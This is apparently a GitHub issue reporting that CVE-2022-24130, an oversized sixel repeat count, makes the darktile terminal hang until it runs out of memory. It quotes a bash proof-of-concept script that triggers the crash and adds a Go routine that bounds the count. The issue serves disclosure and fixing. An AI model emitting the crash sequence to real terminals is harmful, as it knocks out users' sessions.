liamg/darktile

CVE-2022-24130 crashes darktile


As reported by @dankamongmen here: https://nvd.nist.gov/vuln/detail/CVE-2022-24130, a large repeat count within a sixel sequence can cause a crash, either from buffer under/overflow or out of memory. darktile version 0.0.10 instantly hangs trying to allocate memory until the OOM killer steps in.

https://www.openwall.com/lists/oss-security/2022/01/30/3 has a nice test script:

#!/bin/bash
printf "\ePq"
printf "#%hhu;2;%hhu;%hhu;%hhu" 0x41 100 100 100
printf "#%hhu!%u@" 0x41 0x7fffffff
printf "#%hhu!%u@" 0x41 0x7fffffff
printf "\e\\"

Some additional discussion with other terminals is here: https://gitlab.com/klamonte/jexer/-/issues/105
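
An added example, not part of the issue and not darktile's code: one way a Go sixel decoder can bound the repeat count before any pixel buffer grows. The names `SixelWidth` and `ErrSixelTooWide` and the 4096 limit are assumptions made for illustration, and the input in `main` is constructed to match the shape of the test script above.

```go
package main

import (
	"errors"
	"fmt"
)

var ErrSixelTooWide = errors.New("sixel: row exceeds width limit")
func isDigit(b byte) bool { return b >= '0' && b <= '9' }

// SixelWidth walks sixel data (the bytes between "ESC P q" and "ESC \") and
// returns the widest row. maxWidth is an assumed renderer limit.
func SixelWidth(data []byte, maxWidth int) (int, error) {
	x, widest := 0, 0
	for i := 0; i < len(data); i++ {
		c, count := data[i], 1
		switch {
		case c == '$' || c == '-': // carriage return / next sixel row
			x = 0
			continue
		case c == '#': // colour introducer: skip its numeric parameters
			for i+1 < len(data) && (data[i+1] == ';' || isDigit(data[i+1])) {
				i++
			}
			continue
		case c == '!': // repeat introducer: !<count><sixel char>
			for count = 0; i+1 < len(data) && isDigit(data[i+1]); i++ {
				if count <= maxWidth { // saturate instead of overflowing
					count = count*10 + int(data[i+1]-'0')
				}
			}
			i++ // step over the repeated sixel character
		case c < '?' || c > '~': // not a sixel data character: ignore
			continue
		}
		if count > maxWidth-x { // check before advancing so x stays bounded
			return widest, ErrSixelTooWide
		}
		if x += count; x > widest {
			widest = x
		}
	}
	return widest, nil
}

func main() {
	// Constructed input with the same shape as the test script in the issue.
	poc := []byte("#65;2;100;100;100#65!2147483647@#65!2147483647@")
	fmt.Println(SixelWidth(poc, 4096))
}
```

Running a pass like this before allocating lets the decoder size its buffer from a validated width instead of growing it as repeat counts arrive.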